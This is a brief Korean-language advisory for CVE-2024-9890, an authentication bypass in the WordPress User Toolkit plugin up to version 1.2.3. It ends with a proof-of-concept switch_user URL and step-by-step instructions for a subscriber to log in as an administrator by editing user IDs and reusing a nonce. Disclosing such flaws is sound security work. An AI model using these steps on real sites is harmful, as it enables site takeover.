
User Toolkit <= 1.2.3 - 인증된 (구독자+) 인증 우회
User Toolkit <= 1.2.3 - 인증된 (구독자+) 인증 우회
WordPress용 User Toolkit 플러그인은 1.2.3까지의 버전에서 인증 우회에 취약합니다. 이는 'switchUser' 함수의 부적절한 권한 검사 때문입니다. 이로 인해 구독자 수준 이상의 권한을 가진 인증된 공격자가 관리자와 같은 사이트의 기존 사용자로 로그인할 수 있게 됩니다.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-9890
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: user-toolkit
http://kubernetes.docker.internal/wp-login.php?action=switch_user&user_id=4&user_from=1&_wpnonce=8af7611329
자신의 사용자로 로그인하세요. 프로필 페이지의 view-source에서 nonce 값을 가져오세요. user_from 값을 자신의 사용자 ID로 변경하세요. user_id를 관리자의 ID로 변경하세요. 완료!